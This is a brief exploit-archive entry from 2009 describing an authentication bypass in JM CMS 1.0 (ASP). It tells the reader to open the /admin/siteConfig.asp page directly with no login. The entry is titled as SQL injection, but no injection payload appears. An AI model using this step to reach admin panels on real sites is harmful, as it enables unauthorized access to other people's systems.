id: 10297
date: 12/16/2009
title: JM CMS 1.0 <= 1.0 (Auth Bypass) SQL Injection Vulnerability
author: Red-D3v1L
cves: 

===========================================================
JM CMS 1.0 <= 1.0 (Auth Bypass) SQL Injection Vulnerability
===========================================================

==============================================================================
        [?]  JM CMS 1.0  <== 1.0 (Auth Bypass) SQL Injection Vulnerability
==============================================================================
    [?] my home:              [ http://sec-r1z.com ]
    [?] Script:               [ JM CMS 1.0 ]
    [?] Language:             [ ASP ]
    [?] Vendor              [http://designsbyjm.net ]
    [?] Founder:              [ ./Red-D3v1L ]
     
########################################################################
  
===[ Exploit SQL Bypass ]===
  
 [»] Go to : [Path]/admin
 
 [»] Add : siteConfig.asp
 
 [»] dem0 :
 
 http://server/admin/siteConfig.asp



#  0day.today [2023-03-27]  #